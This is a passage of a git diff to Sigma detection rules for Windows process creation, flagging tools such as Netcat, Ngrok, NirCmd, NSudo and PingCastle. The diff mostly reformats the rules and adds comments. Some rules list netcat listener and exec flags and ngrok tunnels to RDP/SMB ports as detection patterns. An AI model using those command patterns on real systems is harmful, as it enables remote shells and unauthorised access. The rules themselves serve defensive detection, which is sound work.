https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf - https://sourceforge.net/projects/mouselock/ @@ -23,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: Mouse Lock - - Company|contains: Misc314 - - CommandLine|contains: Mouse Lock_ + - Product|contains: Mouse Lock + - Company|contains: Misc314 + - CommandLine|contains: Mouse Lock_ condition: process_creation and selection fields: - Product diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml index c5e4990ae..6c9116090 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_netcat.yml @@ -1,9 +1,7 @@ title: PUA - Netcat Suspicious Execution id: e31033fc-33f0-4020-9a16-faf9b31cbf08 status: test -description: Detects execution of Netcat. Adversaries may use a non-application layer - protocol for communication between host and C2 server or among infected hosts - within a network +description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md @@ -23,17 +21,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: + # can not use OriginalFileName as is empty Image|endswith: - \nc.exe - \ncat.exe - \netcat.exe selection_cmdline: - CommandLine|contains: + # Typical command lines + CommandLine|contains: - ' -lvp ' - ' -lvnp' - ' -l -v -p ' - ' -lv -p ' - ' -l --proxy-type http ' + # - ' --exec cmd.exe ' # Not specific enough for netcat - ' -vnl --exec ' - ' -vnl -e ' - ' --lua-exec ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml index 54ba52f41..349eefc2c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_ngrok.yml @@ -1,12 +1,9 @@ title: PUA - Ngrok Execution id: ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31 status: test -description: 'Detects the use of Ngrok, a utility used for port forwarding and tunneling, - often used by threat actors to make local protected services publicly available. - +description: | + Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections. - - ' references: - https://ngrok.com/docs - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html @@ -30,26 +27,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - ' tcp 139' - ' tcp 445' - ' tcp 3389' - ' tcp 5985' - ' tcp 5986' selection2: - CommandLine|contains|all: + CommandLine|contains|all: - ' start ' - --all - --config - .yml selection3: Image|endswith: ngrok.exe - CommandLine|contains: + CommandLine|contains: - ' tcp ' - ' http ' - ' authtoken ' selection4: - CommandLine|contains: + CommandLine|contains: - '.exe authtoken ' - .exe start --all condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml index 2cb1a8b87..7f00427ea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml @@ -1,8 +1,7 @@ title: PUA - Nimgrab Execution id: 74a12f18-505c-4114-8d0b-8448dd5485c6 status: test -description: Detects the usage of nimgrab, a tool bundled with the Nim programming - framework and used for downloading files. +description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. references: - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md author: frack113 @@ -27,9 +26,9 @@ detection: - SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45 selection_hash: - - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B - - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 + - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B + - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 + - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use of Nim on a developer systems diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml index 3c543a9d4..2c8b9204a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd.yml @@ -1,8 +1,7 @@ title: PUA - NirCmd Execution id: 4e2ed651-1906-4a59-a78a-18220fca1b22 status: test -description: Detects the use of NirCmd tool for command execution, which could be - the result of legitimate administrative activity +description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity references: - https://www.nirsoft.net/utils/nircmd.html - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ @@ -23,20 +22,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_org: - - Image|endswith: \NirCmd.exe - - OriginalFileName: NirCmd.exe + - Image|endswith: \NirCmd.exe + - OriginalFileName: NirCmd.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' execmd ' - '.exe script ' - '.exe shexec ' - ' runinteractive ' combo_exec: - CommandLine|contains: + CommandLine|contains: - ' exec ' - ' exec2 ' combo_exec_params: - CommandLine|contains: + CommandLine|contains: - ' show ' - ' hide ' condition: process_creation and (1 of selection_* or all of combo_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml index abe5ac5c2..736fd4d52 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' runassystem ' + CommandLine|contains: ' runassystem ' condition: process_creation and selection fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml index b8012d49a..456824f8b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml @@ -1,9 +1,7 @@ title: PUA - Nmap/Zenmap Execution id: f6ecd1cf-19b8-4488-97f6-00f0924991a3 status: test -description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing - of services running on remote hosts, including those that may be vulnerable to - remote software exploitation +description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation references: - https://nmap.org/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows @@ -22,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \nmap.exe - - \zennmap.exe - - OriginalFileName: - - nmap.exe - - zennmap.exe + - Image|endswith: + - \nmap.exe + - \zennmap.exe + - OriginalFileName: + - nmap.exe + - zennmap.exe condition: process_creation and selection falsepositives: - Legitimate administrator activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml index f46d8bdcf..f30fe9d2a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nps.yml @@ -1,8 +1,7 @@ title: PUA - NPS Tunneling Tool Execution id: 68d37776-61db-42f5-bf54-27e87072d17e status: test -description: Detects the use of NPS, a port forwarding and intranet penetration proxy - server +description: Detects the use of NPS, a port forwarding and intranet penetration proxy server references: - https://github.com/ehang-io/nps author: Florian Roth (Nextron Systems) @@ -22,20 +21,21 @@ detection: selection_img: Image|endswith: \npc.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -server=' - ' -vkey=' - ' -password=' selection_cli_2: - CommandLine|contains: ' -config=npc' + CommandLine|contains: ' -config=npc' selection_hashes: - - Hashes|contains: - - MD5=AE8ACF66BFE3A44148964048B826D005 - - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181 - - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856 - - md5: ae8acf66bfe3a44148964048b826d005 - - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181 - - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856 + # v0.26.10 + - Hashes|contains: + - MD5=AE8ACF66BFE3A44148964048B826D005 + - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181 + - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856 + - md5: ae8acf66bfe3a44148964048b826d005 + - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181 + - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856 condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml index 9a0fa4bd5..d44a9c0af 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_nsudo.yml @@ -21,22 +21,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \NSudo.exe - - \NSudoLC.exe - - \NSudoLG.exe - - OriginalFileName: - - NSudo.exe - - NSudoLC.exe - - NSudoLG.exe + - Image|endswith: + - \NSudo.exe + - \NSudoLC.exe + - \NSudoLG.exe + - OriginalFileName: + - NSudo.exe + - NSudoLC.exe + - NSudoLG.exe selection_cli: - CommandLine|contains: - - '-U:S ' - - '-U:T ' - - '-U:E ' - - '-P:E ' - - '-M:S ' - - '-M:H ' + CommandLine|contains: + # Covers Single/Double dash "-"/"--" + ":" + - '-U:S ' # System + - '-U:T ' # Trusted Installer + - '-U:E ' # Elevated + - '-P:E ' # Enable All Privileges + - '-M:S ' # System Integrity + - '-M:H ' # High Integrity + # Covers Single/Double dash "-"/"--" + "=" - '-U=S ' - '-U=T ' - '-U=E ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml index 9baf42af2..b4a7fda43 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml @@ -1,11 +1,10 @@ title: PUA - PingCastle Execution id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c related: - - id: b37998de-a70b-4f33-b219-ec36bf433dc0 - type: derived + - id: b37998de-a70b-4f33-b219-ec36bf433dc0 + type: derived status: experimental -description: Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level. +description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ @@ -28,162 +27,164 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Hashes|contains: - - MD5=f741f25ac909ee434e50812d436c73ff - - MD5=d40acbfc29ee24388262e3d8be16f622 - - MD5=01bb2c16fadb992fa66228cd02d45c60 - - MD5=9e1b18e62e42b5444fc55b51e640355b - - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 - - MD5=324579d717c9b9b8e71d0269d13f811f - - MD5=63257a1ddaf83cfa43fe24a3bc06c207 - - MD5=049e85963826b059c9bac273bb9c82ab - - MD5=ecb98b7b4d4427eb8221381154ff4cb2 - - MD5=faf87749ac790ec3a10dd069d10f9d63 - - MD5=f296dba5d21ad18e6990b1992aea8f83 - - MD5=93ba94355e794b6c6f98204cf39f7a11 - - MD5=a258ef593ac63155523a461ecc73bdba - - MD5=97000eb5d1653f1140ee3f47186463c4 - - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 - - MD5=32fe9f0d2630ac40ea29023920f20f49 - - MD5=a05930dde939cfd02677fc18bb2b7df5 - - MD5=124283924e86933ff9054a549d3a268b - - MD5=ceda6909b8573fdeb0351c6920225686 - - MD5=60ce120040f2cd311c810ae6f6bbc182 - - MD5=2f10cdc5b09100a260703a28eadd0ceb - - MD5=011d967028e797a4c16d547f7ba1463f - - MD5=2da9152c0970500c697c1c9b4a9e0360 - - MD5=b5ba72034b8f44d431f55275bace9f8b - - MD5=d6ed9101df0f24e27ff92ddab42dacca - - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d - - MD5=5e083cd0143ae95a6cb79b68c07ca573 - - MD5=28caff93748cb84be70486e79f04c2df - - MD5=9d4f12c30f9b500f896efd1800e4dd11 - - MD5=4586f7dd14271ad65a5fb696b393f4c0 - - MD5=86ba9dddbdf49215145b5bcd081d4011 - - MD5=9dce0a481343874ef9a36c9a825ef991 - - MD5=85890f62e231ad964b1fda7a674747ec - - MD5=599be548da6441d7fe3e9a1bb8cb0833 - - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 - - MD5=32d45718164205aec3e98e0223717d1d - - MD5=6ff5f373ee7f794cd17db50704d00ddb - - MD5=88efbdf41f0650f8f58a3053b0ca0459 - - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 - - MD5=781fa16511a595757154b4304d2dd350 - - MD5=5018ec39be0e296f4fc8c8575bfa8486 - - MD5=f4a84d6f1caf0875b50135423d04139f - - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b - - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 - - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d - - SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f - - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa - - SHA1=f14c9633040897d375e3069fddc71e859f283778 - - SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc - - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 - - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 - - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b - - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc - - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 - - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 - - SHA1=607e1fa810c799735221a609af3bfc405728c02d - - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 - - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a - - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 - - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 - - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 - - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 - - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea - - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 - - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 - - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad - - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 - - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 - - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 - - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a - - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db - - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 - - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 - - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 - - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c - - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d - - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 - - SHA1=c82152cddf9e5df49094686531872ecd545976db - - SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 - - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 - - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 - - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d - - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 - - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 - - SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b - - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 - - SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 - - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 - - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f - - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a - - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 - - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b - - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 - - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae - - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 - - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a - - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 - - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 - - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 - - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef - - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d - - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 - - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b - - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b - - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 - - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 - - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca - - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea - - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 - - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 - - SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 - - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 - - SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 - - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 - - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 - - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 - - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 - - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d - - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 - - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 - - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 - - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 - - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 - - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 - - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 - - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd - - Image|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - Hashes|contains: + # PingCastle.exe + - MD5=f741f25ac909ee434e50812d436c73ff + - MD5=d40acbfc29ee24388262e3d8be16f622 + - MD5=01bb2c16fadb992fa66228cd02d45c60 + - MD5=9e1b18e62e42b5444fc55b51e640355b + - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 + - MD5=324579d717c9b9b8e71d0269d13f811f + - MD5=63257a1ddaf83cfa43fe24a3bc06c207 + - MD5=049e85963826b059c9bac273bb9c82ab + - MD5=ecb98b7b4d4427eb8221381154ff4cb2 + - MD5=faf87749ac790ec3a10dd069d10f9d63 + - MD5=f296dba5d21ad18e6990b1992aea8f83 + - MD5=93ba94355e794b6c6f98204cf39f7a11 + - MD5=a258ef593ac63155523a461ecc73bdba + - MD5=97000eb5d1653f1140ee3f47186463c4 + - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 + - MD5=32fe9f0d2630ac40ea29023920f20f49 + - MD5=a05930dde939cfd02677fc18bb2b7df5 + - MD5=124283924e86933ff9054a549d3a268b + - MD5=ceda6909b8573fdeb0351c6920225686 + - MD5=60ce120040f2cd311c810ae6f6bbc182 + - MD5=2f10cdc5b09100a260703a28eadd0ceb + - MD5=011d967028e797a4c16d547f7ba1463f + - MD5=2da9152c0970500c697c1c9b4a9e0360 + - MD5=b5ba72034b8f44d431f55275bace9f8b + - MD5=d6ed9101df0f24e27ff92ddab42dacca + - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d + - MD5=5e083cd0143ae95a6cb79b68c07ca573 + - MD5=28caff93748cb84be70486e79f04c2df + - MD5=9d4f12c30f9b500f896efd1800e4dd11 + - MD5=4586f7dd14271ad65a5fb696b393f4c0 + - MD5=86ba9dddbdf49215145b5bcd081d4011 + - MD5=9dce0a481343874ef9a36c9a825ef991 + - MD5=85890f62e231ad964b1fda7a674747ec + - MD5=599be548da6441d7fe3e9a1bb8cb0833 + - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 + - MD5=32d45718164205aec3e98e0223717d1d + - MD5=6ff5f373ee7f794cd17db50704d00ddb + - MD5=88efbdf41f0650f8f58a3053b0ca0459 + - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 + - MD5=781fa16511a595757154b4304d2dd350 + - MD5=5018ec39be0e296f4fc8c8575bfa8486 + - MD5=f4a84d6f1caf0875b50135423d04139f + - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b + - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 + - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d + - SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f + - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa + - SHA1=f14c9633040897d375e3069fddc71e859f283778 + - SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc + - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 + - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 + - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b + - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc + - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 + - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 + - SHA1=607e1fa810c799735221a609af3bfc405728c02d + - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 + - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a + - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 + - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 + - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 + - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 + - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea + - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 + - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 + - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad + - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 + - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 + - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 + - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a + - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db + - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 + - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 + - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 + - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c + - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d + - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 + - SHA1=c82152cddf9e5df49094686531872ecd545976db + - SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 + - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 + - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 + - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d + - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 + - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 + - SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b + - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 + - SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 + - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 + - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f + - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a + - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 + - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b + - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 + - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae + - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 + - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a + - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 + - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 + - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 + - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef + - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d + - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 + - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b + - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b + - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 + - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 + - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca + - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea + - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 + - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 + - SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 + - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 + - 